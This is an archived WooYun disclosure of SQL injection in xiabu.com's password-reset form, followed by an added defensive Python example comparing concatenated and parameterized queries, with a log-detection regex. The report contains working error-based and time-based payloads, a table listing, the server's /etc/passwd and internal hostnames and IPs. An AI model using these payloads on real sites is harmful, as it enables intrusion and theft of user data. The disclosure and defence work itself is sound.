WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
2016-04-09: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2016-05-24: The vendor has proactively ignored the vulnerability; details disclosed to the public.
Xiabu Xiabu (呷哺呷哺) WWW main site SQL injection (root privileges, able to read system files / 5000+ registered users' information)
http://www.xiabu.com/?c=forgot
In the password-recovery flow, a later step contains SQL injection, and the verification code can be sent directly to the attacker's mailbox.
The injection is in the new-password field.
Parameter: Password (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: [email protected]&Password=1qaz2wsx AND (SELECT 8852 FROM(SELECT COUNT(*),CONCAT(0x7162767a71,(SELECT (ELT(8852=8852,1))),0x7178717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- vGLe&submit=%E4%B8%8B%E4%B8%80%E6%AD%A5

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: [email protected]&Password=1qaz2wsx AND (SELECT * FROM (SELECT(SLEEP(5)))VVpc)-- kCHu&submit=%E4%B8%8B%E4%B8%80%E6%AD%A5
---
web server operating system: Windows NT 4.0 or 7
web application technology: PHP 5.4.27, Apache 2.2.27
back-end DBMS: MySQL 5.0
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] xiabu

Database: xiabu
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| web_reg         | 5597    |  (registered users)
| web_message     | 958     |
| web_dianpu      | 493     |
| en_dianpu       | 428     |
| web_show        | 178     |
| web_dianpu_type | 98      |
| en_dianpu_type  | 74      |
| web_news        | 56      |
| en_show         | 40      |
| web_jobs_type   | 30      |
| web_jobs        | 22      |
| en_jobs_type    | 18      |
| en_ads          | 17      |
| en_diaocha      | 16      |
| web_diaocha     | 16      |
| en_about        | 15      |
| en_news         | 14      |
| en_show_type    | 14      |
| web_about       | 13      |
| web_show_type   | 13      |
| web_ygfc        | 11      |
| en_reg          | 8       |
| en_wenda        | 8       |
| web_wenda       | 8       |
| en_jobs         | 7       |
| en_links        | 7       |
| web_ads         | 7       |
| web_links       | 7       |
| en_admin        | 6       |
| en_news_type    | 6       |
| web_admin       | 6       |
| web_news_type   | 6       |
| en_ygfc         | 5       |
| en_ads_type     | 4       |
| web_slide       | 4       |
| en_message      | 3       |
| en_slide        | 2       |
| web_ads_type    | 2       |
| en_base         | 1       |
| en_setting      | 1       |
| en_ygfc_type    | 1       |
| web_base        | 1       |
| web_setting     | 1       |
| web_ygfc_type   | 1       |
+-----------------+---------+
Some of the user information: phone numbers, email addresses, etc.
The injection point runs with root privileges, so system files can be read directly.
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
www:x:500:500::/alidata/www:/sbin/nologin
mysql:x:501:501::/home/mysql:/sbin/nologin

hosts file

127.0.0.1 localhost
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
10.144.46.176 AY14061214481586734fZ
10.163.253.61 iZ2817lk55sZ
Filter sensitive characters.
Could not reach the vendor, or the vendor actively declined.
Vulnerability Rank: 15 (WooYun rating)
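The report points at the new-password field of the password-recovery step and recommends filtering sensitive characters. The following is an added example, not code from the report or from xiabu.com, showing the two sides of that fix: a reset handler that concatenates the new password into the UPDATE (the pattern that yields the error-based and time-based injections above) next to a parameterized version, plus a log-side heuristic that flags the markers visible in the report's payloads (SLEEP(, INFORMATION_SCHEMA, CONCAT(0x...)). It uses an in-memory SQLite database in place of MySQL; the column names email and password on web_reg are assumptions (only the table name web_reg is on the page), and the payload and sample rows are constructed.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data: two users in a table modelled on web_reg.
    Column names are assumptions; the real schema is not on the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE web_reg (email TEXT PRIMARY KEY, password TEXT)")
    conn.executemany(
        "INSERT INTO web_reg VALUES (?, ?)",
        [("alice@example.com", "old-a"), ("bob@example.com", "old-b")],
    )
    conn.commit()
    return conn


def reset_password_vulnerable(conn, email, new_password):
    # User input spliced into the SQL text: a quote in new_password ends the
    # string literal and the rest of the value becomes part of the statement.
    sql = f"UPDATE web_reg SET password='{new_password}' WHERE email='{email}'"
    conn.execute(sql)
    conn.commit()


def reset_password_safe(conn, email, new_password):
    # Parameterized statement: values travel separately from the SQL text, so
    # quotes, comment markers or SLEEP() in the password are stored literally.
    conn.execute(
        "UPDATE web_reg SET password=? WHERE email=?", (new_password, email)
    )
    conn.commit()


def passwords(conn):
    """Current email -> password mapping, ordered by email."""
    return dict(conn.execute("SELECT email, password FROM web_reg ORDER BY email"))


# Constructed payload: closes the string literal and comments out the WHERE
# clause, so the vulnerable handler rewrites every user's password.
PAYLOAD = "x' -- "


# Heuristic for reviewing request logs or a WAF rule on the Password field:
# markers taken from the payloads reproduced in the report. Legitimate
# passwords almost never contain SQL functions or schema names.
SUSPICIOUS = re.compile(
    r"(?i)\bSLEEP\s*\(|INFORMATION_SCHEMA|\bCONCAT\s*\(\s*0x|\bELT\s*\(|--\s"
)


def looks_like_injection(field_value):
    """True when the field value carries one of the injection markers above."""
    return bool(SUSPICIOUS.search(field_value))


def demo():
    """Run both handlers against the same constructed payload."""
    vuln = make_db()
    reset_password_vulnerable(vuln, "alice@example.com", PAYLOAD)
    safe = make_db()
    reset_password_safe(safe, "alice@example.com", PAYLOAD)
    return {"vulnerable": passwords(vuln), "safe": passwords(safe)}


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
    print(looks_like_injection("1qaz2wsx AND (SELECT * FROM (SELECT(SLEEP(5)))VVpc)-- kCHu"))
```

Character filtering, as the report suggests, narrows the problem but has to anticipate every encoding the database accepts; binding parameters removes the class of bug regardless of the characters sent. The second finding in the report, reading system files, comes from the application connecting as a MySQL account with root-level privileges, so the same hardening pass should give the web application its own account with only the table rights it needs.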